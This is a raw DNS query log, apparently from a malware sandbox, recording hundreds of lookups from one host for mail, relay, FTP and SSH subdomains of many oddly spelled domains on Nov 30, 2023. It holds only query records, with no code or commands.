Nov 30, 2023 11:22:53.424034119 CET	192.168.2.4	1.1.1.1	0x17e3	Standard query (0)	mailgate.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.424165010 CET	192.168.2.4	1.1.1.1	0x1207	Standard query (0)	mailgate.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.424726963 CET	192.168.2.4	1.1.1.1	0x4540	Standard query (0)	mailgate.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.426107883 CET	192.168.2.4	1.1.1.1	0x5d68	Standard query (0)	rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.427464008 CET	192.168.2.4	1.1.1.1	0x80ae	Standard query (0)	mailgate.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.525516033 CET	192.168.2.4	1.1.1.1	0xca39	Standard query (0)	relay.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.565896988 CET	192.168.2.4	1.1.1.1	0x3b5e	Standard query (0)	mail.6ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.605315924 CET	192.168.2.4	1.1.1.1	0x89ab	Standard query (0)	ww38.aqh.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.611241102 CET	192.168.2.4	1.1.1.1	0x6e3c	Standard query (0)	relay.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.614382982 CET	192.168.2.4	1.1.1.1	0xc873	Standard query (0)	relay.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.618254900 CET	192.168.2.4	1.1.1.1	0x15f9	Standard query (0)	relay.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.618254900 CET	192.168.2.4	1.1.1.1	0xe38d	Standard query (0)	relay.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.707251072 CET	192.168.2.4	1.1.1.1	0xd47d	Standard query (0)	mailgate.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.724535942 CET	192.168.2.4	1.1.1.1	0x815d	Standard query (0)	relay.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.724535942 CET	192.168.2.4	1.1.1.1	0x4540	Standard query (0)	mailgate.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.726928949 CET	192.168.2.4	1.1.1.1	0x4c8	Standard query (0)	mailgate.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.726928949 CET	192.168.2.4	1.1.1.1	0x3c92	Standard query (0)	relay.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.805675983 CET	192.168.2.4	1.1.1.1	0x4db4	Standard query (0)	mailgate.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.884670973 CET	192.168.2.4	1.1.1.1	0xe38d	Standard query (0)	relay.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.137413979 CET	192.168.2.4	1.1.1.1	0x4db4	Standard query (0)	mailgate.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.140609980 CET	192.168.2.4	1.1.1.1	0x48be	Standard query (0)	ftp.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.142395973 CET	192.168.2.4	1.1.1.1	0x351	Standard query (0)	relay.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.142395973 CET	192.168.2.4	1.1.1.1	0xf35f	Standard query (0)	relay.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.145277023 CET	192.168.2.4	1.1.1.1	0x1359	Standard query (0)	mailgate.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.210766077 CET	192.168.2.4	1.1.1.1	0x80b7	Standard query (0)	relay.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.266899109 CET	192.168.2.4	1.1.1.1	0xdd53	Standard query (0)	mail.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.343139887 CET	192.168.2.4	1.1.1.1	0xfd76	Standard query (0)	relay.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.353768110 CET	192.168.2.4	1.1.1.1	0x990e	Standard query (0)	relay.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.353768110 CET	192.168.2.4	1.1.1.1	0xc21d	Standard query (0)	relay.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.366091013 CET	192.168.2.4	1.1.1.1	0x7a45	Standard query (0)	relay.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.614310980 CET	192.168.2.4	1.1.1.1	0xbd84	Standard query (0)	ssh.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.701718092 CET	192.168.2.4	1.1.1.1	0x4b0b	Standard query (0)	relay.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.749773026 CET	192.168.2.4	1.1.1.1	0x8929	Standard query (0)	relay.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.755690098 CET	192.168.2.4	1.1.1.1	0x3bee	Standard query (0)	relay.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.948123932 CET	192.168.2.4	1.1.1.1	0xe5b0	Standard query (0)	relay.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.958272934 CET	192.168.2.4	1.1.1.1	0xbf5c	Standard query (0)	relay.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:54.963293076 CET	192.168.2.4	1.1.1.1	0xba4f	Standard query (0)	relay.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.070897102 CET	192.168.2.4	1.1.1.1	0x27b9	Standard query (0)	relay.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.073647022 CET	192.168.2.4	1.1.1.1	0x57d7	Standard query (0)	relay.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.122553110 CET	192.168.2.4	1.1.1.1	0x9a91	Standard query (0)	relay.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.135332108 CET	192.168.2.4	1.1.1.1	0xd7dc	Standard query (0)	relay.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.136153936 CET	192.168.2.4	1.1.1.1	0x4ae4	Standard query (0)	relay.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.270229101 CET	192.168.2.4	1.1.1.1	0xa27f	Standard query (0)	relay.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.270962954 CET	192.168.2.4	1.1.1.1	0x944a	Standard query (0)	relay.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.271938086 CET	192.168.2.4	1.1.1.1	0x58c7	Standard query (0)	relay.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.315355062 CET	192.168.2.4	1.1.1.1	0xa0d0	Standard query (0)	relay.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.327012062 CET	192.168.2.4	1.1.1.1	0x27b9	Standard query (0)	relay.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.327974081 CET	192.168.2.4	1.1.1.1	0x147a	Standard query (0)	relay.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.330387115 CET	192.168.2.4	1.1.1.1	0x5176	Standard query (0)	relay.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.436701059 CET	192.168.2.4	1.1.1.1	0x22b0	Standard query (0)	relay.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.437072039 CET	192.168.2.4	1.1.1.1	0xd7dc	Standard query (0)	relay.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.443999052 CET	192.168.2.4	1.1.1.1	0x9b9e	Standard query (0)	relay.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.446683884 CET	192.168.2.4	1.1.1.1	0xd5db	Standard query (0)	relay.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.446683884 CET	192.168.2.4	1.1.1.1	0x97b9	Standard query (0)	relay.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.447463036 CET	192.168.2.4	1.1.1.1	0x2b70	Standard query (0)	relay.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.498514891 CET	192.168.2.4	1.1.1.1	0x9b24	Standard query (0)	relay.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.499399900 CET	192.168.2.4	1.1.1.1	0x508e	Standard query (0)	relay.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.500647068 CET	192.168.2.4	1.1.1.1	0x863a	Standard query (0)	relay.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.502909899 CET	192.168.2.4	1.1.1.1	0x934e	Standard query (0)	relay.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.519321918 CET	192.168.2.4	1.1.1.1	0x7fe4	Standard query (0)	relay.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.520847082 CET	192.168.2.4	1.1.1.1	0xfc4a	Standard query (0)	relay.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.525284052 CET	192.168.2.4	1.1.1.1	0x19cc	Standard query (0)	relay.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.549282074 CET	192.168.2.4	1.1.1.1	0x6b12	Standard query (0)	relay.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.550602913 CET	192.168.2.4	1.1.1.1	0x624b	Standard query (0)	relay.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.552205086 CET	192.168.2.4	1.1.1.1	0x908d	Standard query (0)	relay.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.552205086 CET	192.168.2.4	1.1.1.1	0xe744	Standard query (0)	relay.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.552205086 CET	192.168.2.4	1.1.1.1	0xd062	Standard query (0)	relay.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.569287062 CET	192.168.2.4	1.1.1.1	0x3d0d	Standard query (0)	relay.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.569287062 CET	192.168.2.4	1.1.1.1	0x34d5	Standard query (0)	relay.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.595680952 CET	192.168.2.4	1.1.1.1	0x841a	Standard query (0)	relay.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.595680952 CET	192.168.2.4	1.1.1.1	0x5e49	Standard query (0)	relay.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.595680952 CET	192.168.2.4	1.1.1.1	0x61a3	Standard query (0)	relay.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.627347946 CET	192.168.2.4	1.1.1.1	0x747c	Standard query (0)	relay.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.627347946 CET	192.168.2.4	1.1.1.1	0xa9fa	Standard query (0)	relay.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.628221035 CET	192.168.2.4	1.1.1.1	0xa0b7	Standard query (0)	relay.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.629137039 CET	192.168.2.4	1.1.1.1	0xabaf	Standard query (0)	relay.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.629137039 CET	192.168.2.4	1.1.1.1	0x82ef	Standard query (0)	relay.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.629930973 CET	192.168.2.4	1.1.1.1	0x74ac	Standard query (0)	pop.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.629942894 CET	192.168.2.4	1.1.1.1	0xfc9a	Standard query (0)	relay.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.632302046 CET	192.168.2.4	1.1.1.1	0x4b0e	Standard query (0)	relay.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.632302046 CET	192.168.2.4	1.1.1.1	0xde08	Standard query (0)	relay.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.697566986 CET	192.168.2.4	1.1.1.1	0xdb73	Standard query (0)	relay.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.698148966 CET	192.168.2.4	1.1.1.1	0x771	Standard query (0)	relay.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.702198982 CET	192.168.2.4	1.1.1.1	0xc179	Standard query (0)	relay.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.703238010 CET	192.168.2.4	1.1.1.1	0xfe45	Standard query (0)	relay.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.705638885 CET	192.168.2.4	1.1.1.1	0x899	Standard query (0)	relay.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.707117081 CET	192.168.2.4	1.1.1.1	0x1ccf	Standard query (0)	relay.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.707117081 CET	192.168.2.4	1.1.1.1	0xc0b	Standard query (0)	relay.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.707117081 CET	192.168.2.4	1.1.1.1	0x5d89	Standard query (0)	relay.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.721261024 CET	192.168.2.4	1.1.1.1	0xbc31	Standard query (0)	relay.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.759169102 CET	192.168.2.4	1.1.1.1	0x863a	Standard query (0)	relay.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.770113945 CET	192.168.2.4	1.1.1.1	0x52b0	Standard query (0)	relay.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.815335035 CET	192.168.2.4	1.1.1.1	0xbe40	Standard query (0)	relay.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.815335035 CET	192.168.2.4	1.1.1.1	0xe7a5	Standard query (0)	relay.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.815335035 CET	192.168.2.4	1.1.1.1	0x12d1	Standard query (0)	relay.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.816356897 CET	192.168.2.4	1.1.1.1	0xe4c6	Standard query (0)	relay.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.816616058 CET	192.168.2.4	1.1.1.1	0x2961	Standard query (0)	relay.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818033934 CET	192.168.2.4	1.1.1.1	0x7caa	Standard query (0)	relay.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818033934 CET	192.168.2.4	1.1.1.1	0x441a	Standard query (0)	relay.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818033934 CET	192.168.2.4	1.1.1.1	0x5d60	Standard query (0)	relay.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818033934 CET	192.168.2.4	1.1.1.1	0x987f	Standard query (0)	relay.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818512917 CET	192.168.2.4	1.1.1.1	0x9bc3	Standard query (0)	relay.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.818512917 CET	192.168.2.4	1.1.1.1	0xfee8	Standard query (0)	relay.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.819031000 CET	192.168.2.4	1.1.1.1	0x5683	Standard query (0)	relay.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.889288902 CET	192.168.2.4	1.1.1.1	0xe106	Standard query (0)	relay.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.889288902 CET	192.168.2.4	1.1.1.1	0x4c60	Standard query (0)	relay.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.919821978 CET	192.168.2.4	1.1.1.1	0xa9fa	Standard query (0)	relay.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.920357943 CET	192.168.2.4	1.1.1.1	0x5b5	Standard query (0)	relay.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.921264887 CET	192.168.2.4	1.1.1.1	0x5028	Standard query (0)	relay.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.924994946 CET	192.168.2.4	1.1.1.1	0x99b2	Standard query (0)	relay.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.932080984 CET	192.168.2.4	1.1.1.1	0x97a	Standard query (0)	relay.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:55.932080984 CET	192.168.2.4	1.1.1.1	0xb0ca	Standard query (0)	relay.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.080576897 CET	192.168.2.4	1.1.1.1	0x5683	Standard query (0)	relay.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.297370911 CET	192.168.2.4	1.1.1.1	0xe106	Standard query (0)	relay.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.297370911 CET	192.168.2.4	1.1.1.1	0x99b2	Standard query (0)	relay.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.297635078 CET	192.168.2.4	1.1.1.1	0xed25	Standard query (0)	relay.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.304002047 CET	192.168.2.4	1.1.1.1	0x231c	Standard query (0)	relay.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.304002047 CET	192.168.2.4	1.1.1.1	0x8672	Standard query (0)	relay.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.314719915 CET	192.168.2.4	1.1.1.1	0x4ed0	Standard query (0)	imap.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.314719915 CET	192.168.2.4	1.1.1.1	0x2e75	Standard query (0)	relay.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.549468994 CET	192.168.2.4	1.1.1.1	0xed25	Standard query (0)	relay.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.774465084 CET	192.168.2.4	1.1.1.1	0xbdb5	Standard query (0)	relay.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:56.807440996 CET	192.168.2.4	1.1.1.1	0xb082	Standard query (0)	imap.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.072869062 CET	192.168.2.4	1.1.1.1	0xb082	Standard query (0)	imap.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.219192028 CET	192.168.2.4	1.1.1.1	0x5268	Standard query (0)	pop3.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.269493103 CET	192.168.2.4	1.1.1.1	0x8b1c	Standard query (0)	relay.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.582928896 CET	192.168.2.4	1.1.1.1	0x8b1c	Standard query (0)	relay.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:57.867362022 CET	192.168.2.4	1.1.1.1	0xebcb	Standard query (0)	mailgate.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.094362974 CET	192.168.2.4	1.1.1.1	0xc43a	Standard query (0)	smtp.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.094362974 CET	192.168.2.4	1.1.1.1	0x20be	Standard query (0)	pop.1.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:58.586153984 CET	192.168.2.4	1.1.1.1	0xf906	Standard query (0)	relay.rhic-boutique.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:01.287928104 CET	192.168.2.4	1.1.1.1	0x945c	Standard query (0)	ssh.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:01.602240086 CET	192.168.2.4	1.1.1.1	0x945c	Standard query (0)	ssh.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.367444992 CET	192.168.2.4	1.1.1.1	0xceba	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.397763014 CET	192.168.2.4	1.1.1.1	0x25ac	Standard query (0)	mailstore1.secureserver.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:04.648212910 CET	192.168.2.4	1.1.1.1	0xceba	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:05.654191017 CET	192.168.2.4	1.1.1.1	0xceba	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.147393942 CET	192.168.2.4	1.1.1.1	0x5dcc	Standard query (0)	ftp.bjail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.275084972 CET	192.168.2.4	1.1.1.1	0x482	Standard query (0)	ftp.6ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.275547981 CET	192.168.2.4	1.1.1.1	0x81c0	Standard query (0)	ftp.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.275701046 CET	192.168.2.4	1.1.1.1	0x7dd0	Standard query (0)	ftp.m7l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.275701046 CET	192.168.2.4	1.1.1.1	0x827e	Standard query (0)	ftp.ct.ated.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.278362989 CET	192.168.2.4	1.1.1.1	0x6983	Standard query (0)	ftp.96l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.309585094 CET	192.168.2.4	1.1.1.1	0x47de	Standard query (0)	pop.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.575647116 CET	192.168.2.4	1.1.1.1	0x47de	Standard query (0)	pop.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.497025967 CET	192.168.2.4	1.1.1.1	0x1fd8	Standard query (0)	mail.96l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.669073105 CET	192.168.2.4	1.1.1.1	0xf232	Standard query (0)	mail.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.734250069 CET	192.168.2.4	1.1.1.1	0xe26c	Standard query (0)	mail.il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.738221884 CET	192.168.2.4	1.1.1.1	0x1faf	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.940588951 CET	192.168.2.4	1.1.1.1	0xf232	Standard query (0)	mail.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.996499062 CET	192.168.2.4	1.1.1.1	0xe26c	Standard query (0)	mail.il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.996499062 CET	192.168.2.4	1.1.1.1	0x1faf	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.491239071 CET	192.168.2.4	1.1.1.1	0xe910	Standard query (0)	imap.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.533360004 CET	192.168.2.4	1.1.1.1	0x9b91	Standard query (0)	mail.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.114784002 CET	192.168.2.4	1.1.1.1	0xe910	Standard query (0)	imap.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.114818096 CET	192.168.2.4	1.1.1.1	0xe26c	Standard query (0)	mail.il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.303874016 CET	192.168.2.4	1.1.1.1	0x5d5f	Standard query (0)	pop.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.364921093 CET	192.168.2.4	1.1.1.1	0xbbad	Standard query (0)	mailgate.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.625147104 CET	192.168.2.4	1.1.1.1	0xbbad	Standard query (0)	mailgate.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.660983086 CET	192.168.2.4	1.1.1.1	0x563	Standard query (0)	pop3.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.043569088 CET	192.168.2.4	1.1.1.1	0x493b	Standard query (0)	mailgate.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.135171890 CET	192.168.2.4	1.1.1.1	0xf222	Standard query (0)	mail.ct.ated.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.172337055 CET	192.168.2.4	1.1.1.1	0xe33e	Standard query (0)	relay.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.391530991 CET	192.168.2.4	1.1.1.1	0x53e5	Standard query (0)	um.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.436918974 CET	192.168.2.4	1.1.1.1	0x1a68	Standard query (0)	bnder.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.441812038 CET	192.168.2.4	1.1.1.1	0xd3c6	Standard query (0)	relay.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.475331068 CET	192.168.2.4	1.1.1.1	0xe33e	Standard query (0)	relay.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.480567932 CET	192.168.2.4	1.1.1.1	0x8e6c	Standard query (0)	bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.482243061 CET	192.168.2.4	1.1.1.1	0x6527	Standard query (0)	um.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.658584118 CET	192.168.2.4	1.1.1.1	0x53e5	Standard query (0)	um.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.771286011 CET	192.168.2.4	1.1.1.1	0x6527	Standard query (0)	um.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.807981014 CET	192.168.2.4	1.1.1.1	0x999d	Standard query (0)	ftp.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.843250036 CET	192.168.2.4	1.1.1.1	0xef3e	Standard query (0)	mail.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.851258993 CET	192.168.2.4	1.1.1.1	0x48fe	Standard query (0)	vip-mail.superhosting.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.879388094 CET	192.168.2.4	1.1.1.1	0xbc8e	Standard query (0)	ssh.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.099296093 CET	192.168.2.4	1.1.1.1	0x4dc2	Standard query (0)	pop.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.099296093 CET	192.168.2.4	1.1.1.1	0x48fe	Standard query (0)	vip-mail.superhosting.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.149285078 CET	192.168.2.4	1.1.1.1	0x628d	Standard query (0)	imap.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.304023027 CET	192.168.2.4	1.1.1.1	0x167e	Standard query (0)	smtp.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.479237080 CET	192.168.2.4	1.1.1.1	0x9dad	Standard query (0)	pop3.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.519577026 CET	192.168.2.4	1.1.1.1	0x59dc	Standard query (0)	mailgate.bnder.co.uk	A (IP address)	IN (0x0001)	false
